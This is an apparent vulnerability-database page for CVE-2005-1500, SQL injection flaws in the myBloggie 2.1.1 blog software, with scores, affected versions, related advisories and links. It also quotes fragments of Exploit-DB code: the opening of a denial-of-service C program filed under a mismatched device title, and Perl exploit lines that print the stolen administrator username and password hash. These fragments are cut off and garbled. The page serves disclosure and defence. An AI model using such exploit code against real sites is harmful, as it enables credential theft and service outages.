CVE-2005-1500
published 2005-05-11CVE-2005-1500: Multiple SQL injection vulnerabilities in myBloggie 2.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the keyword parameter in search.php…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.54%
83.0th percentile
Multiple SQL injection vulnerabilities in myBloggie 2.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the keyword parameter in search.php; or (2) the date_no parameter in viewdate mode, (3) the cat_id parameter in viewcat mode, the (4) month_no or (5) year parameter in viewmonth mode, or (6) post_id parameter in viewid mode to index.php. NOTE: item (1) was discovered to affect 2.1.3 as well.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mywebland | mybloggie | <= 2.1.6 | — |
| mywebland | mybloggie | — | — |
| mywebland | mybloggie | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-76pf-qw9h-4mcg: Multiple SQL injection vulnerabilities in myBloggie 2
ghsa_unreviewed·2022-05-01
CVE-2005-1500 [HIGH] CWE-89 GHSA-76pf-qw9h-4mcg: Multiple SQL injection vulnerabilities in myBloggie 2
Multiple SQL injection vulnerabilities in myBloggie 2.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the keyword parameter in search.php; or (2) the date_no parameter in viewdate mode, (3) the cat_id parameter in viewcat mode, the (4) month_no or (5) year parameter in viewmonth mode, or (6) post_id parameter in viewid mode to index.php. NOTE: item (1) was discovered to affect 2.1.3 as well.
GHSA
GHSA-x6m6-8vmr-89mp: Multiple SQL injection vulnerabilities in myBloggie 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3003 [HIGH] GHSA-x6m6-8vmr-89mp: Multiple SQL injection vulnerabilities in myBloggie 2
Multiple SQL injection vulnerabilities in myBloggie 2.1.6 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat_id or (2) year parameter to index.php in a viewuser action, different vectors than CVE-2005-1500 and CVE-2005-4225.
No detection rules found.
Exploit-DB
Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service
exploitdb·2005-08-10
CVE-2005-2577 Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service
Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service
---
// source: https://www.securityfocus.com/bid/14536/info
Winterm 1125SE is affected by a remote denial of service vulnerability. This issue is due to the application failing to handle exceptional conditions in a proper manner.
The problem occurs when processing packets with malformed IP headers. A successful attack causes the application to crash, denying service to legitimate users.
/*
* 3com superstack II RAS 1500 remote Denial of Service
*
* Piotr Chytla
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
#include
#include
#include
#include
#define OPT_LEN 4
void usage()
{
printf("Args: \n");
printf("-s [source address]\n")
Exploit-DB
MyBloggie 2.1.1 < 2.1.2 - SQL Injection
exploitdb·2005-05-31
CVE-2005-1500 MyBloggie 2.1.1 < 2.1.2 - SQL Injection
MyBloggie 2.1.1 (.*?)/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
}
else {
$page=~m/ (.*?)/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
}
$page=~m/(.*?)/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-05-31]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111531904608224&w=2http://marc.info/?l=bugtraq&m=111722848308367&w=2http://mywebland.com/forums/viewtopic.php?t=180http://secunia.com/advisories/14980http://www.securityfocus.com/bid/13507http://www.securityfocus.com/bid/15017https://exchange.xforce.ibmcloud.com/vulnerabilities/20439http://marc.info/?l=bugtraq&m=111531904608224&w=2http://marc.info/?l=bugtraq&m=111722848308367&w=2http://mywebland.com/forums/viewtopic.php?t=180http://secunia.com/advisories/14980http://www.securityfocus.com/bid/13507http://www.securityfocus.com/bid/15017https://exchange.xforce.ibmcloud.com/vulnerabilities/20439
2005-05-11
Published